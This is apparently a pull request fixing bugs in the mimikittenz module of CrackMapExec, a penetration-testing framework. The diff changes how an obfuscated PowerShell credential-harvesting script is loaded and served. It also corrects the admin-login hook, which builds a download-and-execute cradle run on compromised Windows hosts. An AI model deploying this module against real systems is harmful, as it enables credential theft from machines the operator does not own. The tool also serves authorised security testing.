### PR TITLE
Fixed errors in on_request, options, and admin_login

### DIFF
--- a/cme/modules/mimikittenz.py
+++ b/cme/modules/mimikittenz.py
@@ -18,9 +18,10 @@ class CMEModule:
     def options(self, context, module_options):
         '''
         '''
+        self.ps_script = obfs_ps_script('mimikittenz/Invoke-mimikittenz.ps1')
         return
 
-    def on_admin_login(self, context, command):
+    def on_admin_login(self, context, connection):
         command = 'Invoke-mimikittenz'
         launcher = gen_ps_iex_cradle(context, 'Invoke-mimikittenz.ps1', command)
         ps_command = create_ps_command(launcher)
@@ -33,9 +34,9 @@ class CMEModule:
             request.send_response(200)
             request.end_headers()
 
-            with open(get_ps_script('mimikittenz/Invoke-mimikittenz.ps1'), 'r') as ps_script:
-                ps_script = obfs_ps_script(ps_script.read(), function_name=self.obfs_name)
-                request.wfile.write(ps_script)
+            #with open(get_ps_script('mimikittenz/Invoke-mimikittenz.ps1'), 'r') as ps_script:
+            #    ps_script = obfs_ps_script(ps_script.read(), function_name=self.obfs_name)
+            request.wfile.write(self.ps_script)
 
         else:
             request.send_response(404)


### PR DESCRIPTION
These errors were fixed:

py2.7.egg/cme/modules/mimikittenz.py", line 28, in on_admin_login
    connection.execute(ps_command)
NameError: global name 'connection' is not defined
Fri Apr  7 04:05:54 2017 <Greenlet at 0xb6485f2cL: smb(Namespace(content=False, cred_id=[], darrell=False, <protocol.database instance at 0xb6c1524c>, '172.18.1.69')> failed with NameError

...

File "/usr/local/lib/python2.7/dist-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikittenz.py", line 37, in on_request
    ps_script = obfs_ps_script(ps_script.read(), function_name=self.obfs_name)
AttributeError: CMEModule instance has no attribute 'obfs_name'




